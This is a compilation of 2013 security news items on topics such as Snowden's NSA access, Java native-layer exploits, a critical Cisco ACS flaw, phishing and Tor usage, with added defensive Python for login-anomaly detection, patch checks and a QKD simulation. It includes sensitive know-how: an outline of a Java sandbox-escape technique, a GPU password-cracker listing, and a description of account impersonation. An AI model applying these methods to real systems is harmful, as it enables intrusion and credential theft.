  11. New York, NY – Producers of DRAGON DAY announced that the political and psychological thriller will begin a limited release in theaters November 1. Ex-NSA engineer Duke Evans and his wife and child try to rebuild a new life in a remote mountain town when without notice all power, communications, transportation and banking is shut down. Caught in the middle of an unprecedented cyber-attack, Duke and his family must rely upon a survivalist spirit and raw ingenuity to avoid lawless neighbors and an encroaching dictatorship that demands total loyalty. They cannot run. They cannot hide. How will they make it with food, water, and time running out? The movie explores themes of the NSA, privacy, China, and the exploding national debt. Do we really believe that the national debt will simply go away? What happens when China asks Americans to pay, one way or another? Dragon Day will premiere at the HackerHalted cyber-security event in Atlanta, GA on September 19-21 before a gathering of more than 1500 certified hackers who work to protect individuals, companies, and government from attacks. The movie stars Ethan Flower (Parenthood, Die Hard 4), Osa Wallander, Jenn Gotzon (Doonby, Frost/Nixon), Scoot McNairy (Argo, Killing them Softly, Monsters), Eloy Mendez, William Knight, and Hope Laubach. Directed, written, and produced by award-winning filmmaker Jeffrey Travis, Dragon Day is co-written and produced by Matt Patterson, executive produced by Steve Markham, and produced by Alex Sobol. Kazimir Boyle is the composer. Burning Myth Productions (Los Angeles, CA) and Matter Media Studios (Austin, TX and Los Angeles, CA) developed and funded the project. Request an interview with director and producers at: 646-410-2030 or susan@differentdrummer.com Source EHackingNews.Com
  12. A pair of Italian security researchers investigating the practice of Facebook scamming estimates that the trade brings in around $200m a year. Andrea Stroppa and Carlo De Micheli analyzed the pricing of Facebook spam on 20 black-market websites offering access to Facebook users for a price. The spammers set up fan sites and encourage people to join them, then pump out spam messages to encourage click-throughs, bringing in between $87m and $390m per year. "The spam posters get paid an average of $13 per post, for pages that have around 30,000 fans, up to an average of $58 to post on pages with more than 100,000 fans," De Micheli told The Guardian. "If we consider these two as extremes, the pages we analysed generate a revenue of 18,000 posts per day, times the revenue per post – ranging from $13 to $58 – 365 days a year." The researchers found that such spam was being used to drive traffic to YouTube videos and e-commerce sites using shortened URLs to disguise the location of the linked-to page. Google also inadvertently benefits – around 9 per cent of the spammer's links make money from redirects to AdSense-funded pages. Spammers seem to have little care as to what they set up spam fan sites for – the team noted one for victims of the Boston terrorist bombing, but said that the spammers they contacted insisted they were doing nothing wrong. "Facebook doesn't ban us, simply because we generate the content on Facebook itself. Every day I materialize funny, and interesting content full of phrases and so forth that is shared and liked by thousands of users," said one in a Skype conversation. "Without the fan pages Facebook would be an empty place. Tell me how many links do you see shared by your friends on your timeline everyday? You see – the answer is simple." Facebook spam has been around for a while – the researchers found adverts for spamming payments going back to 2010 – but in the last year or so spamming services have matured and grown. 
Facebook told the paper it was doing what it could. "We have developed a number of automated systems to identify potentially harmful links and stop them from spreading," a company spokesman said. "Those systems quickly spotted these links, and we are working to clear them from the site now." ® Source TheRegister.Co.Uk
  13. The US National Security Agency may have some of the most sophisticated cyber-surveillance programs in the world, but it was trivial for former NSA contractor Edward Snowden to walk off with sensitive data, sources say, owing to the agency's antiquated internal security. "The [Defense Department] and especially NSA are known for awesome cyber security, but this seems somewhat misplaced," former US security official Jason Healey told NBC News on Thursday. "They are great at some sophisticated tasks but oddly bad at many of the simplest." While some sources claimed that it was Snowden's genius for infiltrating electronic systems that allowed him to make off with a cache of at least 20,000 documents – "Every day, they are learning how brilliant [Snowden] was," one former US official said – other sources suggested that all he needed was a little determination and the right business card. "It's 2013," an insider told NBC, "and the NSA is stuck in 2003 technology." For example, the NSA policy prevents a typical worker from doing things like copying files to USB thumb drives or other external storage. But Snowden had an easy way around those restrictions, simply by virtue of being classified as a "systems administrator". With that privilege, Snowden would have been able to move files around at will, sources claim. If higher-ups ever questioned him about it, he could have claimed he was doing so in order to repair a corrupted drive or some other maintenance operation. Snowden's administrator account also gave him the ability to log into the accounts of other users of the agency's NSAnet computer systems – some of whom had higher security clearance than Snowden himself did. In essence, Snowden was able to impersonate those NSA employees to gain access to highly sensitive documents, which he was then able to copy to thumb drives. This was so easy to do that one source described him as a "ghost user" of NSAnet, whose activities couldn't easily be traced. 
The NSA is reportedly only now piecing together the exact steps Snowden took to infiltrate its systems, including identifying specific users whose accounts he used to access documents. But there's no clear paper trail – investigators are said to be looking for red-flag discrepancies, such as accounts that were accessed while their owners were on vacation. Once he began collecting documents, Snowden was surely also emboldened by the fact that, as a contractor working for Booz Allen Hamilton in Hawaii, he never once needed to set foot in NSA headquarters. Instead, he could access the files he wanted from a computer terminal some 5,000 miles away. The NSA reportedly employs around 40,000 people, roughly 1,000 of which are systems administrators. Like Snowden, most of those systems admins are contractors – or they were, at least. Earlier this month, NSA director General Keith Alexander announced that the agency plans to reduce its total number of sysadmins by 90 per cent, specifically to reduce the number of staffers who have access to secret information. Such measures come too late to reduce the impact of Snowden's leaks, however. As one former intelligence official described the aftermath of Snowden's disclosures to NBC News, "The damage, on a scale of 1 to 10, is a 12." ® Source TheRegister.Co.Uk
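The red flag the investigators are described as hunting for, accounts used while their owners were away, is a detection that any environment with an authentication log and a leave calendar can run, and the companion pattern in the same post, one administrator's workstation logging on as many different people, is just as cheap to look for. The Python below is an added example, not anything NBC or the NSA described; the absence calendar and the authentication events are constructed, and the log format (ISO timestamp, account, workstation, outcome) is an assumption to adapt to your own source.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed absence calendar: account -> (first day away, first day back).
ABSENCES = {
    "alice": (datetime(2013, 5, 20), datetime(2013, 5, 31)),
    "bob": (datetime(2013, 6, 3), datetime(2013, 6, 7)),
}

# Constructed authentication log: timestamp, account, workstation, outcome.
# The format is an assumption; adapt parse_auth_log() to the real source.
AUTH_LOG = """\
2013-05-22T09:14:00 alice WS-HI-0042 success
2013-05-22T09:20:00 carol WS-HI-0042 success
2013-05-22T09:26:00 dave WS-HI-0042 success
2013-05-23T14:00:00 bob WS-MD-0101 success
2013-06-04T11:05:00 bob WS-HI-0042 success
2013-06-10T08:00:00 alice WS-MD-0007 success
2013-06-10T08:01:00 erin WS-MD-0007 failure
"""


def parse_auth_log(text):
    """Successful logons as (timestamp, account, workstation) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, host, outcome = line.split()
        if outcome == "success":          # failed attempts are a different alert
            events.append((datetime.fromisoformat(ts), user, host))
    return events


def logins_during_absence(events, absences):
    """Logons that fall inside the account owner's recorded absence window."""
    flagged = []
    for ts, user, host in sorted(events):
        window = absences.get(user)
        if window and window[0] <= ts < window[1]:
            flagged.append((ts, user, host))
    return flagged


def hosts_with_many_accounts(events, window=timedelta(hours=1), min_accounts=3):
    """Workstations from which at least min_accounts distinct accounts logged on
    within any sliding window of the given length: what one person cycling
    through colleagues' accounts looks like in the log."""
    by_host = defaultdict(list)
    for ts, user, host in events:
        by_host[host].append((ts, user))
    flagged = {}
    for host, rows in by_host.items():
        rows.sort()
        for i, (start, first_user) in enumerate(rows):
            users = {first_user}
            j = i + 1
            while j < len(rows) and rows[j][0] - start <= window:
                users.add(rows[j][1])
                j += 1
            if len(users) >= min_accounts:
                flagged.setdefault(host, set()).update(users)
    return {host: sorted(users) for host, users in flagged.items()}


if __name__ == "__main__":
    ev = parse_auth_log(AUTH_LOG)
    for ts, user, host in logins_during_absence(ev, ABSENCES):
        print(f"owner absent: {user} logged on from {host} at {ts}")
    for host, users in hosts_with_many_accounts(ev).items():
        print(f"many accounts from {host}: {', '.join(users)}")
```

The absence check only works if the calendar is authoritative and the log records which workstation, not just which account, performed the logon; the second check is the one that does not need a calendar at all, which is why it is worth running continuously rather than only after the fact.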
  14. Whether you consider the Internet of Things (all the way up to the Internet of Everything) to be the Way of The Future™ or just This Year's Buzzword®, something of an exaggeration, there's a good chance some of you will run into some of its real-world manifestations in the near future. After all, the building you work in is already wired up with sensors and right now, they're using proprietary protocols that make them hard to wire into applications. The industry's long-term vendor vision is that these critters will soon all be talking IP to make connection easier and more useful. Existing sensors will also be joined by many, many, millions more, so that anything worth measuring can be measured ... and then managed. To make that and other things happen, the boffins in charge of creating a world of sensor-based stuff using IP to communicate have had to re-think connectivity pretty much from the bottom up. With the assistance of Cisco distinguished engineer Jeff Apcar, The Register has taken a dive under the skin of the IPv6 Routing Protocol for Low-Power and Lossy Networks (RPL, pronounced “ripple”), a key emerging IETF standard for routing Internet of Everything messages. Some parts of the hypothesised Internet of Things/Internet of Everything – for the rest of this article we'll stick to IoE – don't look that much different to any Internet client. Take a connected car, for example. Give it an IP interface of some kind, give it mobile connectivity, and hey presto! the car is connected to the Internet (with the attendant risks that may involve, but that's another story). The imagined future collections of sensors are different. Computing power is cheap, and so are “real-world” interfaces like microphones, accelerometers, gyroscopes, thermometers and so on. Connectivity, it turns out, can be non-trivial thanks to various wireless standards. 
But routing messages from huge numbers of devices is very complex, which is why outfits like Cisco are working up new routing protocols to serve the sensor-based Internet. To understand the need for new routing techniques, consider a city-wide network of sound sensors. Such a network is posited as being able to identify the noise profile of a nearby car accident so an ambulance can be despatched before the drivers have stopped arguing and called the police. Traffic management centres could also start to re-route cars seconds after the sounds of bumper striking bumper and glass hitting tarmac are registered. The model only works if you have a lot of sensors around, and that poses practical problems because it's not worth collecting that data if you have to replace sensors every few weeks. Sensor designs therefore imagine devices that are completely stand-alone, communicate wirelessly and can go years between battery replacements (or are "scavenger-class" devices that work on solar or wind power). Sensor designs of this sort mean you can simply affix them to a handy solid object and forget them; having to connect power to every single device would destroy any business case such a sensor network could support. Source TheRegister.Co.Uk
  15. The US Department of Homeland Security (DHS) warned law enforcement, security and government workers against using outdated versions of Google Android, claiming that 79 percent of all mobile malware targets the platform. The DHS issued the warning in a Roll Call Release for US emergency services. The department said criminal interest in Android is due to a combination of its impressive market share, open architecture and fragmented ecosystem. High malware figures were cited as proof that agents using smart devices must ensure their phones and tablets always run the latest software available. "Android is the world's most widely used mobile operating system (OS) and continues to be a primary target for malware attacks due to its market share and open source architecture," read the report. "The growing use of mobile devices by federal, state and local authorities makes it more important than ever to keep mobile OS patched and up to date." Interestingly, despite being all but defunct, Nokia's ancient Symbian OS is the second most targeted, with the DHS finding that 19 percent of all mobile malware is designed for it. While high, the 19 percent figure is probably a false indicator of criminals' interest in Symbian today, and is likely to be composed of older malware rather than dangerous new threats. Prior to the arrival of Android, Symbian was the OS of choice for criminals due to its ties to Nokia, but since buyers became more interested in Android and iOS, criminal interest in Symbian has waned. Apple iOS and "other" operating systems were both listed as being the victims of 0.7 percent of all mobile malware. At the very bottom Windows Phone and BlackBerry were each listed as being the target of 0.3 percent of the world's mobile malware. The low number of threats targeting Apple iOS, despite the popularity of its iPhone and iPad devices, is largely due to the closed security model. 
This model forces developers to sell their wares on Apple's official App Store, which closely vets all applications before allowing them into the marketplace. Earlier this year F-Secure security expert Mikko Hypponen praised Apple for its robust security, listing the App Store as one of the security community's greatest achievements. The findings mirror those of numerous security vendors. Kaspersky Labs reported detecting 100,000 mobile malware variants targeting Android during the second quarter of 2013, in its IT Threat Evolution report. Source V3.CO.UK
  16. Criminal groups are using Java native layer vulnerabilities to infiltrate businesses and government systems, according to security firm Trend Micro. Trend Micro threats analyst Jack Tang reported the shift in a blog post, confirming the new attacks on Oracle's Java platform are getting increasingly complex. He wrote: "Java exploits can be divided into two types: Java layer exploits and Java native layer exploits. In the past, Java layer vulnerabilities were more common, but that is no longer the case. Before 2013, there was a three-to-one ratio of Java layer vulnerabilities to Java native layer vulnerabilities. Starting this year, however, we are now seeing more native layer flaws." Tang said the move to target Java Native Layer exploits is troubling as they show an advance in sophistication within the cyber criminal community. "Java native layer exploits target the Java native layer runtime. These exploits are harder to create, as they need to bypass OS-level protections like ASLR [address space layout randomisation] and DEP [Data Execution Prevention]. In addition, the skills needed to create native layer exploits are more difficult to acquire," he wrote. "This year, however, attackers clearly have the capability to take advantage of native layer vulnerabilities. Two methods of exploitation are becoming more common, one is to make use of a Java array length overflow to tamper with the JavaBeans.Statement object's AccessControlContext member." Tang added that the exploits detected are doubly dangerous as they grant the attacker a number of powers over successfully infected systems. "An attacker can then use the array object to get or set the following buffer precisely. They can tamper with the following JavaBeans.Statement object's acc field, which points to a AccessControlContext object. In general, the acc field will be tampered to point to a full permission AccessControlContext object. This will let arbitrary code be run on the affected system." 
Oracle's Java platform has been a growing target for cyber criminals. Over the last year the attacks have forced Oracle to release a number of out of cycle security updates. Director of enterprise security at Trusteer Dana Tamir said despite having fixes available many firms are yet to release the updates, meaning criminals can and are still creating attacks to target them. "Vulnerable versions of Java can still be found in many organisations. This is either because users haven't upgraded to the latest Java version available, or because some tools or applications bundle vulnerable versions of Java. This leaves an open window to attackers who exploit such vulnerabilities in order to compromise employee endpoints and gain a foothold in the network," said Tamir. Tang mirrored Tamir's sentiment calling for businesses to update their systems as soon as possible. "We urge users to carefully evaluate whether their usage of Java is necessary and ensure that copies of Java that are used are updated, to reduce exposure to present and future Java flaws," he wrote. Java security issues have been a recurring theme throughout 2013 with numerous patches issued by the likes of Oracle and Apple. Source V3.CO.UK
  17. Instead of playing the smart guy with others, you'd do better to sit down and explain it to the man. Anttzzk: A Facebook password cannot be "cracked". It can be obtained through various methods: social engineering, keyloggers, various viruses.
  18. The vulnerability could allow remote, unauthenticated attackers to take control of the underlying operating system, the company said Cisco Systems released security patches for Secure Access Control Server (Secure ACS) for Windows to address a critical vulnerability that could allow unauthenticated attackers to remotely execute arbitrary commands and take control of the underlying operating system. Cisco Secure ACS is an application that allows companies to centrally manage access to network resources for various types of devices and users. According to Cisco's documentation, it enforces access control policies for VPN, wireless and other network users and it authenticates administrators, authorizes commands, and provides an audit trail. Cisco Secure ACS supports two network access control protocols: Remote Access Dial In User Service (RADIUS) and Terminal Access Controller Access-Control System Plus (TACACS+). The newly patched vulnerability is identified as CVE-2013-3466 and affects Cisco Secure ACS for Windows versions 4.0 through 4.2.1.15 when configured as a RADIUS server with Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling (EAP-FAST) authentication. "The vulnerability is due to improper parsing of user identities used for EAP-FAST authentication," Cisco said Wednesday in a security advisory. "An attacker could exploit this vulnerability by sending crafted EAP-FAST packets to an affected device." "Successful exploitation of the vulnerability may allow an unauthenticated, remote attacker to execute arbitrary commands and take full control of the underlying operating system that hosts the Cisco Secure ACS application in the context of the System user for Cisco Secure ACS running on Microsoft Windows," the company said. The vulnerability received the maximum severity score, 10.0, in the Common Vulnerability Scoring System (CVSS), which indicates that it is highly critical. 
Cisco Secure ACS for Windows version 4.2.1.15.11 was released to address the flaw. There are no known workarounds, so upgrading to the patched version of the application is recommended. Source ComputerWorld.Com
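Version strings such as 4.2.1.15 and 4.2.1.15.11 are easy to compare wrongly, by eye or as plain strings, so the affected-range check is worth writing down. The Python below is an added example, not Cisco's advisory text or tooling; the host inventory is constructed and its field names are assumptions. It encodes only what the post above states for CVE-2013-3466: affected 4.0 through 4.2.1.15 when configured as a RADIUS server with EAP-FAST, fixed in 4.2.1.15.11, no workaround.

```python
from dataclasses import dataclass


def parse_version(s):
    """'4.2.1.15.11' -> (4, 2, 1, 15, 11); tuples compare numerically, field by field,
    so 4.10 sorts after 4.9 and 4.2.1.15.11 after 4.2.1.15 (string comparison gets
    the first of those wrong)."""
    return tuple(int(part) for part in s.strip().split("."))


# Boundaries taken from the advisory as quoted above.
AFFECTED_MIN = parse_version("4.0")
AFFECTED_MAX = parse_version("4.2.1.15")      # inclusive
FIXED = parse_version("4.2.1.15.11")


@dataclass
class AcsHost:
    """Constructed inventory record; the field names are an assumption."""
    name: str
    version: str
    radius_server: bool    # configured as a RADIUS server
    eap_fast: bool         # EAP-FAST authentication enabled


def assess(host):
    v = parse_version(host.version)
    if v < AFFECTED_MIN or v[0] != AFFECTED_MIN[0]:
        return "outside-stated-range"   # the advisory only speaks about the 4.x train
    if v >= FIXED:
        return "patched"
    # Builds between 4.2.1.15 and 4.2.1.15.11 are not mentioned in the advisory;
    # anything below the fix is treated as needing the upgrade.
    if host.radius_server and host.eap_fast:
        return "vulnerable"             # reachable by unauthenticated EAP-FAST packets
    return "upgrade-needed"             # no workaround is published, so patch regardless


def report(hosts):
    return {h.name: assess(h) for h in hosts}


# Constructed inventory, not real hosts.
INVENTORY = [
    AcsHost("acs-dc1", "4.2.1.15", True, True),
    AcsHost("acs-dc2", "4.2.1.15.11", True, True),
    AcsHost("acs-lab", "4.1.4.13", True, False),
    AcsHost("acs-new", "5.3.0.40", True, True),
]

if __name__ == "__main__":
    for name, status in report(INVENTORY).items():
        print(f"{name}: {status}")
```

The configuration flags decide priority, not whether to patch: with no workaround published, an affected build without EAP-FAST still needs the upgrade, it just is not exposed to the unauthenticated path the advisory describes.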
  19. A new phishing message loaded with a malicious Google Doc is targeting Gmail users, according to security firm Sophos. Senior security advisor at Sophos Chester Wisniewski reported the scam in a blog post, confirming that the message attempts to dupe users into clicking a suspect link by pretending to be a "Secure Document" from their bank. Wisniewski said the attack is basic in principle, but it is dangerous as the message has been cleverly socially engineered to look like it is authentic and uses an atypical infection method. "While those of us in the security industry might not be surprised, phishing attacks are consistently proving themselves to be one of the most effective ways to evade traditional defences. As many organisations move to the Google cloud, this type of phishing lure will continue to yield results for the criminals," he said. "Many organisations are using Google and other cloud service providers to provide critical IT services. At first glance this could be very believable." The attack reportedly links the victim to a phishing page hosted in Thailand, which attempts to dupe them into entering their password information for a variety of online services. "The page not only asks for your Google credentials, it also suggests it will accept Yahoo, Outlook.com, Hotmail, AOL, Comcast, Verizon, 163.com or any other email account. Of course filling out this form can only end in tears. Your details are sent off to the compromised servers for whatever purposes these thieves desire," he wrote. Wisniewski said the password theft is likely to be the first stage in a wider attempt to steal more information, such as the web user's banking login details. "You might think, so what, my Gmail isn't full of secrets that will destroy my nation/life/career. You would likely be wrong. Your email is the key to unlocking much of your online identity. Forget your banking password? No worries, they will email you a password reset link," he wrote. 
He added that the high success rate of phishing means attacks like this will continue until businesses work harder to educate their staff about cyber best practice. "As an IT administrator these are opportunities to educate your staff on the risks. This might not be the most convincing of the phishes that are out there, but it is a useful tool to educate your staff," he wrote. Phishing is a growing problem facing businesses. Kaspersky Lab reported that the number of phishing messages hitting UK web users has tripled over the last year, with crooks targeting an average of 3,000 Brits every day. The UK government has set up a number of resources to help businesses protect themselves against the influx of attacks. Most recently The GCHQ launched two cyber incident response and advice initiatives, designed to help businesses prepare for and mitigate the damage of cyber attacks. Source V3.CO.UK
  20. Spam and malicious text messages pose a far bigger threat to consumers and businesses than email spam, according to security firm Cloudmark. The firm, which runs the global spam reporting service on behalf of the GSMA, revealed earlier this year that there are six million spam texts sent everyday in the UK. It has now warned that the problem is getting worse due to a number of converging factors driving crooks to mobile spam. The firm’s chief technology officer, Neil Cook, told V3 that the fact people are far more likely to open text messages than emails poses a major problem. “The open rate for an SMS is 80-90 percent within a minute, whereas email you may not look at all day,” he noted. "As a result it is far easier to get someone to open a message telling them to ring a number or visit a website than on email." He also said people are still not as wary about messages they receive on phones as they are via email. “The phone is a more trusted medium, which is why we see more fraud as opposed to bulk spam selling, because fraud is much more easily monetised by getting people to ring a premium number from the text, or visit a malicious website," he said. "There’s not so much screen real estate so it’s harder to tell what is a phishing message or something genuine." Cook also pointed out that the high-end capabilities of smartphones and new, IP-based 4G networks, are ideal for criminals to compromise, something that is posing fresh concerns for operators. “As more people move from fixed to mobile broadband and smartphones then problems from botnets and viruses are moving from PCs to smartphones so there is the potential for real issues here,” he said. “This could also have a big impact on operators as it will chug the network. 
For fixed line this doesn’t affect people so much, but with mobile over the air resources are very precious, so if network is being chewed up with spam sending messages, that’s a concern.” On top of this Cook cited the BYOD trend as a major risk to enterprises that fraudulent texts pose, noting that it only takes one handset to be infected to put an entire organisation at risk. “BYOD is a big issue. One of the new areas we're getting into is helping protect phones from going to malicious websites or calling malicious phone numbers, which is an increasing concern as that’s a route to infect your phone or steal company secrets,” he said. “You only have to have one person infected with a phone running an application key logger or sending company data.” The rising concerns over spam and malicious text messages come amid reviews by the government to tackle this menace, and a stronger stance by the Information Commissioner’s Office (ICO) to hurt the firms behind messages, with several notable fines levied by the watchdog. Source V3.Co.Uk
  21. Enterprise-grade Linux vendor Suse is extending its partnership with VMware by making its Suse Linux Enterprise Server available on the newly launched vCloud Hybrid Service later this year. Suse has had a version of its Enterprise Server distribution optimised and bundled with VMware vSphere cloud computing platform since 2010, with the maintenance costs included in the customer's VMware vSphere support agreement. This agreement has now been extended so that Suse Linux Enterprise Server for VMware will be similarly available through the vCloud Hybrid Service from sometime in the fourth quarter, according to Suse. VMware's vCloud Hybrid Service was first announced by the firm back in March, but will only be made generally available to US customers from September, VMware announced at its VMworld conference in San Francisco this week. The firm declined to give a date for when the vCloud Hybrid Service might be available to customers outside the US. The initiative sees VMware offering public cloud infrastructure-as-a-service (IaaS) capabilities to VMware customers, based on the same platform as they are already using to build an internal private cloud. This enables them to extend out to use additional external resources if and when required, under the control of the same management and orchestration tools. With Suse's extended support, customers will have the option of running workloads on Suse Linux Enterprise Server in the VMware vCloud Hybrid Service, giving them greater flexibility for optimising their IT resources. Brian Green, managing director for Suse UK, said the firm is enjoying a growing joint customer base with VMware thanks to their partnership. "Today's announcement demonstrates that Suse and VMware are continuing to partner to offer our customers choice and improved value. 
Suse Linux is the only Linux distribution optimised for VMware and this announcement allows customers to leverage these benefits through the VMware vCloud Hybrid Service," he said. Suse Linux Enterprise Server for VMware's vCloud Hybrid Service will be available in the fourth quarter of this year, the firm said. Source V3.CO.UK
  22. Description : oclHashcat+ is an advanced GPU hash cracking utility that includes the World's fastest md5crypt, phpass, mscash2 and WPA / WPA2 cracker. It also has the first and only GPGPU-based rule engine, focuses on highly iterated modern hashes, single dictionary-based attacks, and more. Author : Kartan Source : oclHashcat+ Advanced GPU Hash Cracking Utility 0.15 ≈ Packet Storm Download : Here
  23. A couple of security researchers have set spines shivering in the cloud world by demonstrating that Dropbox's obfuscated code can be reverse-engineered, along the way capturing SSL data from the service's cloud and bypassing the two-factor authentication used to secure user data. However, as is clear from the Usenix research paper and has been confirmed by Dropbox, their work doesn't create a generic attack vector. The attacks only work if the attacker already has unfettered access to the target machine. As Dropbox puts it: “In the case outlined here, the user’s computer would first need to have been compromised in such a way that it would leave the entire computer, not just the user's Dropbox, open to attacks across the board.” (More on this in a minute.) Perhaps the most interesting aspect of the work by Openwall's Dhiro Kholia and CodePainters' Przemyslaw Wegrzyn is that they were able to reverse-engineer the heavily protected Dropbox Python code. “Our work reveals the internal API used by Dropbox client and makes it straightforward to write a portable open-source Dropbox client,” they write. As a result, they say, it should be possible for researchers to subject Dropbox to more rigorous security analysis. The researchers also observe that Dropbox's two-factor authentication, used for accessing its Website, is not supported in the client software. “This implies that it is sufficient to have only the host_id value to gain access to the target’s data stored in Dropbox.” However, the host_id value is stored on the local machine in an encrypted SQLite database – meaning it can only be recovered by someone with access to that machine. ® Source TheRegister.CO.Uk
  24. The privacy-enhancing Tor network has seen its total number of users per day more than double in the last month, reaching the highest levels since the project first began compiling usage statistics. Tor traffic was up all over the globe in August 2013 – and we do mean up (Source: Tor Project) The network, which anonymizes internet traffic by routing it through a series of encrypted relays, had been humming along with an average base of around 500,000 directly connected users for most of the year. But that started to change around mid-August, and the results were both sudden and dramatic. As of Wednesday, the Tor network was seeing more than 1,200,000 users connecting daily, a figure that topped the previous record of around 950,000 global daily users in January 2012. The reasons for the usage spike are not clear, but you can pretty much take your pick. The figures come on the heels of a seemingly never-ending series of revelations about security agencies in the US and UK and their roles in spying on internet traffic, both at home and abroad. In early August, Lavabit and Silent Circle both shut down their secure email services, citing government pressure and the difficulty involved in plugging all the leaks inherent in the internet email protocols. Then, as the month rolled on, the US National Security Agency's surveillance activities were revealed to have far surpassed the agency's mandate to keep an eye on foreign agitators. We learned that NSA agents secretly yet routinely shared intelligence with the Drug Enforcement Administration, spied on thousands of US citizens who had no relationship to ongoing terror investigations, and even allegedly bugged the United Nations. Across the pond, Blighty's Government Communications Headquarters stormed the offices of The Guardian newspaper and smashed some of its computer equipment in an apparent attempt to intimidate it into not reporting on the GCHQ's surveillance activities at home. 
Sure enough, Tor users in the US and the UK made up a large portion of the total in August. Around 90,000 Americans were connecting to Tor daily at the start of the month, but that figure grew to around 150,000 daily users by the end. UK daily users grew from around 16,000 to more than 35,000. But other countries saw similar increases, too. India's Tor usage skyrocketed from just 7,500 daily users to over 32,000. In Brazil, usage climbed from around 15,000 to more than 85,000 users. Even China's Tor usage was on the rise – though, given the PRC government's tight control over internet access, there remain fewer than 400 confirmed Chinese Tor users per day, on average. Mind you, there have been similar spikes in Tor usage before, and they have generally been short lived. It's entirely possible that this latest increase may have nothing to do with public concern over domestic spying, but stems from some other cause. For example, in early August the Tor Project admitted that the network had come under attack by a previously unknown malware exploit. A similar assault could potentially be responsible for late August's sudden surge in Tor usage. The Reg will keep you posted if we learn anything new. But whatever the cause, as the Tor Project's Roger Dingledine observed on Tuesday, "It's not just a fluke in the metrics data – it appears that there really are twice as many Tor clients running as before." "Anybody know details?" Dingledine wrote. "It's easy to speculate ... but some good solid facts would sure be useful." Indeed. ® Source TheRegister.Co.Uk
  25. While the world is still waiting for a full-blown quantum communications setup, quantum key distribution – QKD – is already a contested product market. Now, an international collaboration has shown that QKD can be brought to the smartphone. The project, carried out by the University of Bristol, Cambridge, Griffith University in Queensland and Xi’an Jiaotong University in China, has published a paper on Arxiv outlining its work. The researchers have, essentially, split the QKD problem into a client-server architecture, allowing most of the “heavy lifting” to be carried out server-side so that a resource-constrained client like a smartphone. It wouldn't work on any of today's smartphones, since there's still one somewhat exotic component needed at the client end, an on-chip polarisation rotator. And the client device wouldn't be able to use QKD over the air, since it would need to tether to a fibre to receive the quanta from the far end. Whereas most QKD kit on the market today has quantum optics equipment at both ends, the scheme proposed in the Arxiv paper would do most of the quantum work at one end only. “Alice” creates the photons and sends them down the fibre to “Bob”, who only needs the capability to change the photons' polarisation and send them back. The protocol devised to make this work is called rfiQKD, “reference frame independent quantum key distribution”, and it works without needing to align Alice and Bob's equipment. As it's described at MIT's Arxiv Blog: “Instead Alice and Bob make measurements in random directions and then publish the list of directions for anyone to see. 
Only those measurements that happened to be aligned contribute to the code.” As the researchers note in their paper, “the results significantly broaden the operating potential for QKD outside of the laboratory and pave the way for quantum enhanced security for the general public with handheld mobile devices.” And before readers poke fun at the idea of a smartphone containing quantum polarisers on-board, think of this: how many of us carried around accelerometers ten years ago? ® Source TheRegister.Co.Uk
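The sifting step the Arxiv Blog quote describes (random measurement directions, published openly, only aligned positions kept) is modelled below in its simplest two-basis, BB84-style form. This is an added illustration, not code from the paper or the rfiQKD protocol itself; the basis names, photon count and seeded randomness are assumptions, and the optional intercept-and-resend branch shows why a defender checks the error rate of the sifted key before trusting it.

```python
import random

# Two polarisation bases; the names are illustrative, not from the paper.
BASES = ("rectilinear", "diagonal")


def measure(bit, prep_basis, meas_basis, rng):
    """Measuring in the preparation basis recovers the bit exactly;
    measuring in the other basis yields a uniformly random outcome."""
    return bit if prep_basis == meas_basis else rng.randrange(2)


def run_exchange(n, rng, eavesdrop=False):
    """Simulate one round of n photons and return (alice_key, bob_key)
    after sifting, i.e. after both sides publish their bases and keep
    only the positions where they happened to be aligned."""
    a_bits = [rng.randrange(2) for _ in range(n)]
    a_bases = [rng.choice(BASES) for _ in range(n)]

    channel_bits, channel_bases = a_bits, a_bases
    if eavesdrop:
        # Intercept-and-resend: the interceptor must guess a basis for each
        # photon; a wrong guess re-prepares it in the wrong basis, which is
        # what later shows up as errors in the sifted key.
        e_bases = [rng.choice(BASES) for _ in range(n)]
        channel_bits = [measure(b, pb, eb, rng)
                        for b, pb, eb in zip(a_bits, a_bases, e_bases)]
        channel_bases = e_bases

    b_bases = [rng.choice(BASES) for _ in range(n)]
    b_bits = [measure(b, pb, bb, rng)
              for b, pb, bb in zip(channel_bits, channel_bases, b_bases)]

    # Sifting: bases are public, bit values are not. Only aligned
    # positions contribute to the key, as the quoted description says.
    keep = [i for i in range(n) if a_bases[i] == b_bases[i]]
    return [a_bits[i] for i in keep], [b_bits[i] for i in keep]


def error_rate(key_a, key_b):
    """Fraction of sifted positions where Alice and Bob disagree.
    About 0 on a clean channel; about 0.25 under intercept-and-resend."""
    if not key_a:
        return 0.0
    return sum(x != y for x, y in zip(key_a, key_b)) / len(key_a)
```

Roughly half the photons survive sifting, and a clean channel gives identical keys, while an intercept-and-resend attempt pushes the disagreement rate towards one quarter, which is the signal that the round must be discarded.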